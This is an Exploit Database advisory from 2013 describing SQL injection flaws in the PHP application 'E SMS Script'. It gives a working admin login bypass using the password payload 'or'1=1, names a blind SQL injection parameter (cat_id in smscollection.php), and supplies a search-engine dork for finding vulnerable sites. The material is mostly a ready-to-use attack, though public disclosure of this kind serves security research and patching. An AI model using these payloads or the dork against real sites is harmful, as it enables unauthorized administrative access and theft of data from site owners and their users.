E Sms Script – Multiple SQL Injections

• Exploit Database
• 12 阅读

• 作者： cr4wl3r
  日期： 2013-01-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/23967/

• # E SMS Script Multiple SQL Injection Vulnerability
  # By cr4wl3r http://bastardlabs.info
  # http://bastardlabs.info/exploits/E_SMS_Script.txt
  # Good Music: http://goo.gl/TLkEs :)
  # Script: http://www.esmsscript.com/index.php?option=com_content&view=article&id=22&Itemid=41
  # Dork: inurl:"smscollection.php?cat_id="
  
  Proof of concept:
  
  Auth Bypass
  
  http://bastardlabs/admin/adminlogin.php
  Username: cr4wl3r
  Password: 'or'1=1
  
  Blind SQLi
  
  http://bastardlabs/smscollection.php?cat_id=[Blind SQLi]